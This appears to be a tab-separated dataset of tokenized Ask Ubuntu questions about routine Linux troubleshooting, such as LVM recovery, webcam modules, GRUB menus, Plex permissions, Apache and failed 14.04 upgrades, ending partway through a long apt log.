458514	recover lvm disk	i 'm a new linux user and i think i really messed up with lvm while installing ubuntu server 12.04 . i cancelled ( meaning i stupidly pressed the computer 's power button ) ubuntu server 's installation during a lvm setup and now it seems i ca n't access that disk anymore . the server does n't even detect the disk or can even boot past bios for that matter . it just hangs with a message i cant't remember right now because , unfortunately , this situation happened a couple of months ago so i barely remember anything about that particular lvm setup that might help my cause : ( i also connected the disk to my windows computer and it still is n't detected . and btw i already bought a new disk as a replacement , which may make it impossible to reproduce the lvm setup with that specific server 's hardware , i guess . did i just lost this particular disk ? or is there a way to magically recover it somehow ? thanks for helping : )
458515	how to disable internal webcam ?	i want to disable the internal webcam of my laptop running ubuntu 13.10 ? as suggested here , i already disabled the concerning kernel modules by blacklisting them . but after reboot the modules are loaded nevertheless . what can i do to get rid of these modules ? my module blacklist lies in /etc/modprobe.d/blacklist-webcam.conf and looks like this : blacklist videodev blacklist videobuf2_core blacklist videobuf2_memops blacklist videobuf2_vmalloc blacklist uvcvideo but lsmod gives me ( after reboot ) : module size used by uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40499 1 uvcvideo videodev 133509 2 uvcvideo , videobuf2_core edit : when i do a sudo modprobe -r uvcvideo the modules are gone . so i could write a script to do that . but i would not consider that as a clean solution ; - )
458521	can networkmanager use hash password for wifi connection ?	as may be well-known , the networkmanager stores the password for wifi connection in plain text in /etc/networkmanager/system-connections/ < wifi-connection-name > . and the password can be clearly viewed if the password-flag is set to be 0 ( with sudo right , of course ) . my question is whether the nm can support using hash password to work instead of plain text , like wpa_supplicant ( firstly generate the hash code of the original password , then insert this hash code instead of the plain text to work , with the keyword 'hash : ' ) . thanks for any advice !
458522	ubuntu 14.04 maas does n't auto detect ipmi	i have recently upgraded from ubuntu 12.04 to 14.04 . when i pxe boot the nodes i get the message that the node has no power type set so i ca n't commission it . i have tried manually setting the ipmi option however the nodes wo n't boot . this works fine on maas installation from ubuntu 12.04 cd . my nodes are all dell servers .
458525	completely remove kubuntu desktop from ubuntu 14.04 ?	i installed `` kubuntu plasma desktop/netbook system '' from the ubuntu software system to try it out . i prefer unity and want to remove kubuntu . i uninstalled from the ubuntu software center , but it has n't worked . during boot i get `` kubuntu '' on the screen and not `` ubuntu '' , also i can log in into kubuntu and it is working fine . so how can i remove kubuntu and all files that came with it ? when trying sudo apt-get autoremove kubuntu-desktop i get this message : package 'kubuntu-desktop ' is not installed , so not removed here is my terminal output after trying the commands sudo apt-get install aptitude and sudo aptitude remove ' ? and ( ? depends ( ? exact-name ( kubuntu-desktop ) ) , ? not ( ? depends ( ? exact-name ( ubuntu-desktop ) ) ) ) ' : darren @ darren-k52jr : ~ $ sudo apt-get install aptitude [ sudo ] password for darren : reading package lists ... done building dependency tree reading state information ... done aptitude is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 18 not upgraded . darren @ darren-k52jr : ~ $ sudo aptitude remove ' ? and ( ? depends ( ? exact-name ( kubuntu-desktop ) ) , ? not ( ? depends ( ? exact-name ( ubuntu-desktop ) ) ) ) ' no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 18 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . darren @ darren-k52jr : ~ $ using sudo apt-get -- purge remove kubuntu-desktop , sudo apt-get autoremove and run sudo apt-get autoclean i get these result : darren @ darren-k52jr : ~ $ sudo apt-get -- purge remove kubuntu-desktop [ sudo ] password for darren : reading package lists ... done building dependency tree reading state information ... done package 'kubuntu-desktop ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 18 not upgraded . darren @ darren-k52jr : ~ $ ^c darren @ darren-k52jr : ~ $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 18 not upgraded . darren @ darren-k52jr : ~ $ sudo apt-get autoclean reading package lists ... done building dependency tree reading state information ... done del python-imaging 1.1.7+2.0.0-1ubuntu1.1 [ 347 kb ] del python-imaging-compat 1.1.7+2.0.0-1ubuntu1.1 [ 5,410 b ] del libwhoopsie0 0.2.24.1.2 [ 7,350 b ] del ubuntu-tweak 0.8.7-0~bzr1993+20140421~ubuntu13.10.1 [ 994 kb ] del python3-distupgrade 1:0.205.6 [ 136 kb ] del numix-icon-theme 0.3+139~201404162022~ubuntu13.10.1 [ 3,431 kb ] del unity 7.2.0+14.04.20140423-0ubuntu1.1 [ 1,437 kb ] del unity-services 7.2.0+14.04.20140423-0ubuntu1.1 [ 29.3 kb ] del whoopsie 0.2.24.1.2 [ 26.6 kb ] del libcurl3 7.32.0-1ubuntu1.4 [ 198 kb ] del ubuntu-release-upgrader-core 1:0.205.6 [ 24.1 kb ] del flashplugin-installer 11.2.202.350ubuntu0.13.10.1 [ 6,932 b ] del libunity-core-6.0-9 7.2.0+14.04.20140423-0ubuntu1.1 [ 447 kb ] del numix-gtk-theme 2.2+294~201404131947~ubuntu13.10.1 [ 41.5 kb ] del libcurl3-gnutls 7.32.0-1ubuntu1.4 [ 189 kb ] del libsnmp30 5.7.2~dfsg-8ubuntu1.1 [ 1,322 kb ] del libsnmp-base 5.7.2~dfsg-8ubuntu1.1 [ 235 kb ] del ubuntu-release-upgrader-gtk 1:0.205.6 [ 10.5 kb ] darren @ darren-k52jr : ~ $ results for command sudo aptitude search ' ? depends ( ? exact-name ( kubuntu-desktop ) ' : darren @ darren-k52jr : ~ $ sudo aptitude search ' ? depends ( ? exact-name ( kubuntu-desktop ) ' [ sudo ] password for darren : e : match pattern ends unexpectedly ( expected ' ) ' ) . darren @ darren-k52jr : ~ $
458527	usb 2 devices do not work on usb 3 port	different usb 2 and usb devices ( wireless mouse transmitter , usb 2 harddisk , garmin gps ) do not work on usb3 port . they get power but are not recognised . on the usb 2 port everything works fine . other usb 2 devices work ( printer , different usb hdd ) what is the problem ?
458531	ubuntu dual boot installation	here is some information . the last line is the most important question . i have an asus x53s that has windows 7 installed . what i want to do is install ubuntu onto my computer . the c drive currently has 69.9 gb of free space , and my d drive currently has 332 gb of free space . can i install ubuntu onto this machine ? i want to install 100gb of vmware onto the ubuntu environment on this machine . therefore , i want to install the 1gb ubuntu os with 100gb of vmware after . can i do this on d drive ? if not , is there a more efficient way to set up my computer ? thank you !
458533	how do i transfer large files from my phone to my computer ?	i recently downloaded a 6.7 gb file onto my samsung galaxy s3 . i want transfer it to my computer but i get this error : libmtp error : could not get file from device . this is the only time it has ever done it and it is getting annoying . i am also running ubuntu 13.04
458534	laptop not responding after hibernating	i just installed ubuntu 14.04 on my lenovo w510 and most everything works fine except when i close the laptop and it goes to sleep and i open it back up . the startup screen turns on and it looks normal , but the cursor does n't blink on the password login . i can use my mouse but the keyboard does n't respond at all . i have n't found many similar problems , but any advice would be much appreciated !
458535	how to change juju bootstrap time from the 10min it gives you	when i try to boostrap , i get this after 10 mins . the node that it is trying to bootstrap comes on , and starts to install . but then error bootstrap failed : waited for 10m0s without being able to connect : ssh : connect to host 1xx.xx.xx.20 port 22 : connection timed out stopping instance ... bootstrap failed , destroying environment using mass , juju on pure metal . no vm .
458536	jpeg preview in nautilus	i 'm on ubuntu 14.04 using the default nautilus file manager and the problem i 'm having is that some of my jpeg images give a tiny thumbnail but others do n't . it almost seem random . in addition is there a setting as to where i can click on the thumbnail and see a larger preview ?
458537	8179 wireless adaptor not working ubuntu	i am pretty new to ubuntu . i installed ubuntu with wubi on my desktop computer but could n't get my wireless network working . the adapter is a usb tp-link dongle . it is working under windows 7 but not ubuntu on the same computer . i 've been searched google , and the information i tried so far is : by trying sudo lshw -c network , i got the following information *-network description : ethernet interface product : ar8151 v1.0 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : c0 serial : 1c:6f:65 : d6 : ad:42 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi latency=0 link=no multicast=yes port=twisted pair resources : irq:44 memory : fbdc0000-fbdfffff ioport : ef00 ( size=128 ) the lsusb shows it recognize the dongle bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 046d:0824 logitech , inc . bus 002 device 006 : id 0bda:8179 realtek semiconductor corp . bus 002 device 004 : id 046d : c52f logitech , inc. wireless mouse m305 bus 002 device 005 : id 1c4f:0002 sigma micro keyboard tracer gamma ivory but there is no icons on the upper-right corner of the desk for wireless selection , and if i go to edit network , under wireless , there is no network showing up . i run apt-get update , and also the apt-get install b43-fwcutter , but still can not get the wireless working . can anyone help ? many many thanks !
458540	lexmark 2650 software	is there a software or driver that will work on ubuntu 12.04 for a lexmark x2650 printer ? i have looked and found one but forgot where i found it . it had something like the number 8 in it .
458543	need navigation and copy command help	i want is to copy a my fonts and few key files . but my old stuff is now listed as a different owner when i copy it , and i do n't know where the fonts are .
458547	i can not get plex server to see any directories	i have tried adding a directory outside my home directory . /media/plex and soft linked my /videos directory to it . i have also added plex to udev group and also to my user group uid=124 ( plex ) gid=135 ( plex ) groups=135 ( plex ) ,46 ( plugdev ) ,1000 ( marrabld ) and uid=1000 ( marrabld ) gid=1000 ( marrabld ) groups=1000 ( marrabld ) ,4 ( adm ) ,20 ( dialout ) ,24 ( cdrom ) ,46 ( plugdev ) ,116 ( lpadmin ) ,118 ( admin ) ,124 ( sambashare ) ,128 ( vboxusers ) ,135 ( plex ) marrabld is my username . the permissions on the softlink are drwxrwxrwx 2 plex plex 4096 apr 30 21:14 plex but no mater where i tell plex to look , can not see any directories in : /videos ; /media/plex/* or any usb drives i plug in if i sudo su plex i can not see anything in my users home directory either . the permissions in my videos directory are drwxr-xr-x for all of them . xbmc can see all of the files no problem . i have tried the solutions here : plex media manager wo n't find /media/movies or /media/tv internal hdd and plex wo n't enter my home directory or other partitions and a whole bunch of other places with no joy . any help would be appreciated
458548	vmware fusion shared folder does not appear in ubuntu 10 guest	as per these instructions , i shared a host directory in my vm by going to settings -- > sharing . my guest os is ubuntu 10.04.4 , 64-bit and the host is macos . i restarted the vm but the shared folder did not appear as /mnt/hgfs . the /mnt directory on the guest was empty . does something else need to be done , such as user configuration and ownership over the shared directory ?
458551	what to choose : xubuntu or xfce session ?	when logging in i can choose to use xubuntu or xfce . besides the font ( it 's a little blurry in xfce ) and xfce seemingly using a little bit less memory than xubuntu ( which is not an issue ) they look exactly the same to me . what 's the difference ? and which one is faster ?
458554	how to install sql developer on ubuntu 14.04	i am trying to install sql developer on ubuntu 14.04 . i have fallowed some tutorials but none of them worked . so i am asking you if you know how to install sql developer .
458557	why did my nautilus stop displaying thumbnails for text files ?	i 've chosen to have plain-text files displayed with thumbnails in nautilus . however , this has suddenly stopped functioning the other day ( after upgrading to ubuntu 14.04 i guess ) . but there 's no such problem when i log in to a guest session , so the problem is probably in user-specific settings , but where ? ( i emptied the thumbnail cache , but this made no difference . ) i wonder what else i can do in my user settings/configuration to fix this with so few options left in the preferences menu : )
458558	what is sudo apt-get -f install	what is the usage of apt-get -f install . when i run sudo apt-get update i got some errors at the end it says try apt-get -f install . what is this command ? the last part of my error is : . . . going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
458559	installing linux os problem	i am having a problem about instilling linux side by side with widows 7 . i downloaded the iso for desktop launched it and now i am at the try before install part when you already boot the dvd . i start the ubuntu 14.04 lts installer and here 's what happens . 1 i choose a language , 2 connect to wifi , 3 click the check marks next to `` download updates while installing '' and `` install this thrid-party software . then i click next and instead of giving me a choice to select whether to install side by side to windows or not is says `` this computer currently has no detected operating systems . what would you like to do ? but i do have windows 7 on the computer and it works so how do i fix this problem .
458563	transcoder audio edition	has anyone tried the transcoder audio edition written by arman poghosyan ? i found it while searching for software that converts wav files to mp3 , but since it is not in the software center , there is no guarantee that it 's safe . if it 's a good program , can it be submitted for review and inclusion in the software center ? p.s . i 'm a fairly new ubuntu user .
458565	running a program with/without sudo ?	im using qbittorrent-nox on an ubuntu server 14.04 install . im trying to get the program to run unrar on torrents but it does n't work . the command : sudo unrar x -r % f/ % n/*.rar /mnt/ works when typed in the command prompt and i can enter a sudo password , but obviously i cant do that within the program . i guess basically , how do i either give qbittorrent-nox root rights or make unrar not require them ?
458571	zmv:178 : condition expected : $ action	tried to use the zmv function in zsh with the following syntax zmv -n ' ( *.* ) ( . * ) ' ' $ { 1//./ } $ 2 ' and got the following error zmv:178 : condition expected : $ action line 178 in the zmv source code is if [ [ -n $ opt_s & & $ action ! = ln ] ] ; then any ideas how to fix it ? thanks in advance .
458572	how do i prevent one of my partitions messing with lubuntu grub entries ?	i recently deleted my windows xp partition in my dual boot machine ( lubuntu/windows xp ) , replacing it with bhodi linux . everything went smoothly , but now i have a problem : bodhi linux is messing with my lubuntu grub entries , and every time i update something of significance there , grub ends looking like this : is there a way to prevent this ? i know how to edit grub entries , but it seems like quite an annoyance have to do this with every update . ( yesterday i updated lubuntu from 13.10 to 14.04 and that seemed to fix the issue . but later on i updated bodhi linux and there it was again )
458574	how to restore default power plan to ubuntu 12.04 lts	i 've been having battery plan issues . when my laptop is unplugged ubuntu becomes slow . when it 's plugged everything is fine . i assumed something was wrong with my battery plan or something like that . i installed cpufreq and set it on `` ondemand '' . now when my laptop is unplugged it works fine for about 30 minutes then becomes very slow ( when i open something new ) then works fine again . which is terrible and should n't happen . i know there was a thread similiar to this but it 's question used jupiter and i was unable to install it .
458581	what changed in apache2 from saucy to trusty for projects in /var/www	i have some web roots in directories x , y , z , etc . in /var/www/ , some of them ( not /var/www/ ) are mounted with options rw , bind , uid=301 , gid=301 ( 301 is uid of user www-data and gid of group www-data ) . this worked very well in default apache2 of saucy , but no longer with upgraded version in trusty . all permissions of all files and directories under /var/www/ are owned by www-data : www-data . changing all permissions to 777 ( and restarting service ) did n't help ! i never changed any settings in /etc/ ... or somewhere . edit : i 'm getting 404 error when i request under http : //localhost:80/x ( error page suggests that apache is running : apache/2.4.7 ( ubuntu ) server at localhost port 80 ) . no substring error or fatal in /var/log/apache2/error.log or /var/log/apache2/access.log . netstat -tupln shows that apache2 is running on port 80 . any ideas ? edit 2 : now the pages are also broken with lighttpd ( do n't have any css layout and edit links are not shown in mediawiki ( this has been a behavior caused by malious redirection of apache , but can no longer be fixed by requesting the page under different hostnames ) ) . apache behaves as described before
458584	how can i add text-to-speech to goldendict ?	how can i add a text to speech service or any other similar services to goldendict for offline use ? i am using ubuntu 13.10 and i want to learn how to pronounce english words i do n't know .
458587	why is n't the grub menu showing up during boot ?	i have a pc that i have windows 7 and ubuntu installed on in separate partitions . for some reason the grub menu wo n't show up and my pc will boot strait to windows 7 . i can access the text version of grub by pressing c but i do n't know how to use that and even then , it seems that there is no command to boot from my ubuntu partition in that menu . i would really appreciate any help you guys can give me with this issue ! thanks ! by the way , here are some pieces of code that i tried to type into the text grub : grub > find /grub/stage1 error 15 : file not found grub > find /etc/passwd ( hd0,1 ) grub > find /grub/menu.lst error 15 : file not found
458589	flash is not working after latest update	flash is not working , all i get is a black box . i read lots of handy hints , found one that seems to be the answer i am looking for . i went and got the adobe .tar.gz file as recommended . went to put libflashplayer.so into /usr/lib/flashplugin-installer/ but get told `` permission denied '' ? ? what do i do please ? how do i put the libflashplayer.so file into the lib ?
458598	how do remove `` ignoring file in directory /etc/apt/sources.list.d/ as it has an invalid filename extension ?	since upgrading 13.10 to 14.04 , i get these annoying messages each time i install , update , upgrade , and so on : n : ignoring file 'webupd8team-java-raring.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'bumblebee-stable-raring.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'steam.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'ubuntu-x-swat-x-updates-raring.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'xorg-edgers-ppa-raring.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'webupd8team-java-raring.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'bumblebee-stable-raring.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'steam.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'ubuntu-x-swat-x-updates-raring.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'xorg-edgers-ppa-raring.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension how do i fix the underlying problem told in the message ? edit : sometimes , i get additional messages appended to the messages above : w : gpg error : http : //www.duinsoft.nl debs release : the following signatures could n't be verified because the public key is not available : no_pubkey e18ce6625cb26b26 w : failed to fetch http : //ppa.launchpad.net/person/ppa/ubuntu/dists/karmic/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/person/ppa/ubuntu/dists/karmic/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . and sometimes , i might others , but i can not find the precise messages anymore .
458600	where can i find the `` default numeric numpad keys '' option in 14.04 ?	this community help wiki explains how to make ubuntu enable numlock upon login : system settings > keyboard layout > options > miscellaneous compatibility options check `` default numeric keypad keys '' that worked for me in 12.04 but no longer works in 14.04 because the menu structure has changed . how can i access that setting in 14.04 ?
458602	apache private key encryption	i have a web server with ssl , and i was wondering if encrypting the private key on the disk ( -des3 flag when creating it ) was really useful , or if setting permissions to 400 on it was enough ? ( if someone gains root access to the server i do n't think it will be helpful in any way since he could do pretty much everything he wants ) thanks , oli
458603	ubuntu 14.04 upgrade from 13.10 : using unofficial software packages not provided by ubuntu	i am having an issues upgrading to 14.04 ( trusty tahr ) from 13.10 ( saucy salamander ) , where i get a message could not calculate the upgrade , and i believe it is due to my unofficial software packages . can someone please suggest which packages i should resolve , and how to resolve these packages ? my question is similar to this one here , but i need help in implementing the solution that resolves the packages . i already unchecked all packages under `` other '' in the software and updates menu while trying to upgrade through software updater . running a grep broken /var/log/dist-upgrade/apt.log showed me multiple packages , but i 'm not sure which ones are broken and how to resolve them before upgrading . i suspect my configuration with bumblebee and nvidia optimus has added some ppa 's and other non-supported software . here is my grep broken /var/log/dist-upgrade/apt.log output : broken libqt5core5a : amd64 breaks on libqt5core5 [ amd64 ] < 5.0.2+dfsg1-7ubuntu11.1 > ( libs ) ( < 5.2.0+dfsg~ ) broken libharfbuzz0b : amd64 conflicts on libharfbuzz0a [ amd64 ] < 0.9.19-1 > ( libs ) broken cups-filters : amd64 conflicts on foomatic-filters [ amd64 ] < 4.0.17-1ubuntu1 > ( universe/text ) broken libboost1.54-dev : amd64 conflicts on libboost1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libclutter-1.0-0 : amd64 breaks on libcogl12 [ amd64 ] < 1.14.0-2 > ( libs ) broken unity-control-center : amd64 conflicts on gnome-control-center-unity [ amd64 ] < 1.3+13.10.20131004-0ubuntu1 > ( gnome ) broken libgoa-1.0-0b : amd64 conflicts on libgoa-1.0-0 [ amd64 ] < 3.8.3-2 > ( libs ) broken libtcl8.6 : amd64 conflicts on tcl8.6-lib [ amd64 ] < 8.6.0-1ubuntu1 > ( interpreters ) ( < 8.6.0-2 ) broken unity-control-center-signon : amd64 conflicts on gnome-control-center-signon [ amd64 ] < 0.1.7~+13.10.20130724.1-0ubuntu1 > ( gnome ) broken libboost-serialization1.54-dev : amd64 conflicts on libboost-serialization1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken evolution-data-server : amd64 conflicts on evolution-data-server-goa [ amd64 ] < 3.8.5-1ubuntu3 > ( gnome ) ( < 3.10.3-0ubuntu2~ ) broken libopenmpi1.6 : amd64 conflicts on libopenmpi1.3 [ amd64 ] < 1.4.5-1ubuntu2 > ( libs ) broken libopenmpi1.6 : amd64 conflicts on openmpi-libs0 [ amd64 ] < none > ( none ) broken libtk8.6 : amd64 conflicts on tk8.6-lib [ amd64 ] < 8.6.0-1ubuntu1 > ( libs ) ( < 8.6.0-2 ) broken libboost-system1.54-dev : amd64 conflicts on libboost-system1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken tk : amd64 conflicts on tk-lib [ amd64 ] < 8.5.0-2ubuntu5 > ( libs ) broken tk : amd64 conflicts on tk8.5-lib [ amd64 ] < 8.5.11-2ubuntu4 > ( libs ) broken tcl : amd64 conflicts on tcl-lib [ amd64 ] < 8.5.0-2ubuntu5 > ( interpreters ) broken tcl : amd64 conflicts on tcl8.5-lib [ amd64 ] < 8.5.13-1ubuntu4 > ( interpreters ) broken libboost-filesystem1.54-dev : amd64 conflicts on libboost-filesystem1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-date-time1.54-dev : amd64 conflicts on libboost-date-time1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-test1.54-dev : amd64 conflicts on libboost-test1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-atomic1.54-dev : amd64 conflicts on libboost-atomic1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-chrono1.54-dev : amd64 conflicts on libboost-chrono1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-mpi1.54-dev : amd64 conflicts on libboost-mpi1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libunity-core-6.0-9 : amd64 conflicts on libunity-core-6.0-8 [ amd64 ] < 7.1.2+13.10.20131014.1-0ubuntu1 > ( libs ) broken libunity-core-6.0-9 : amd64 conflicts on unity-common [ amd64 ] < none > ( none ) broken libboost-mpi1.53.0 : amd64 depends on libopenmpi1.3 [ amd64 ] < 1.4.5-1ubuntu2 > ( libs ) broken libboost-regex1.54-dev : amd64 conflicts on libboost-regex1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-program-options1.54-dev : amd64 conflicts on libboost-program-options1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-thread1.54-dev : amd64 conflicts on libboost-thread1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken icu-devtools : amd64 breaks on icu-tools [ amd64 ] < 4.8.1.1-12ubuntu2 > ( libdevel ) ( < 52.1-3~ ) broken icu-devtools : amd64 breaks on icu-tools [ i386 ] < none > ( none ) ( < 52.1-3~ ) broken libboost-context1.54-dev : amd64 conflicts on libboost-context1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-mpi-python1.54-dev : amd64 conflicts on libboost-mpi-python1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-exception1.54-dev : amd64 conflicts on libboost-exception1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-graph1.54-dev : amd64 conflicts on libboost-graph1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-locale1.54-dev : amd64 conflicts on libboost-locale1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost1.54-tools-dev : amd64 conflicts on libboost1.53-tools-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost1.54-tools-dev : amd64 conflicts on libboost1.53-tools-dev [ i386 ] < none > ( none ) broken libboost-python1.54-dev : amd64 conflicts on libboost-python1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-graph-parallel1.54-dev : amd64 conflicts on libboost-graph-parallel1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-wave1.54-dev : amd64 conflicts on libboost-wave1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-iostreams1.54-dev : amd64 conflicts on libboost-iostreams1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken libboost-timer1.54-dev : amd64 conflicts on libboost-timer1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-math1.54-dev : amd64 conflicts on libboost-math1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-signals1.54-dev : amd64 conflicts on libboost-signals1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken libboost-random1.54-dev : amd64 conflicts on libboost-random1.53-dev [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libdevel ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken libboost-mpi-python1.53.0 : amd64 depends on libboost-mpi1.53.0 [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libs ) broken xserver-xorg-video-glamoregl : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-radeon : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken libboost-graph-parallel1.53.0 : amd64 depends on libboost-mpi1.53.0 [ amd64 ] < 1.53.0-6+exp3ubuntu8 > ( libs ) broken libcogl-pango12 : amd64 depends on libcogl12 [ amd64 ] < 1.14.0-2 > ( libs ) ( > = 1.13.4 ) broken libgd-gd2-perl : amd64 conflicts on libgd-gd2-noxpm-perl [ amd64 ] < none - > 1:2.46-2.1build1 > ( universe/perl ) broken gnome-control-center-datetime : amd64 depends on indicator-datetime [ amd64 ] < 13.10.0+13.10.20131023.2-0ubuntu1.1 - > 13.10.0+14.04.20140415.3-0ubuntu1 > ( misc ) ( = 13.10.0+13.10.20131023.2-0ubuntu1.1 ) broken libvlccore5 : amd64 depends on vlc-data [ amd64 ] < 2.0.8-1 - > 2.1.2-2build2 > ( universe/graphics ) ( = 2.0.8-1 ) broken libperl5.14 : amd64 depends on perl-base [ amd64 ] < 5.14.2-21build1 - > 5.18.2-2ubuntu1 > ( perl ) ( = 5.14.2-21build1 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140420.48d3dbc8-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140429.2fd1a05a-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140420.48d3dbc8-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140429.2fd1a05a-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140420.48d3dbc8-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140420.48d3dbc8-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140429.2fd1a05a-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : 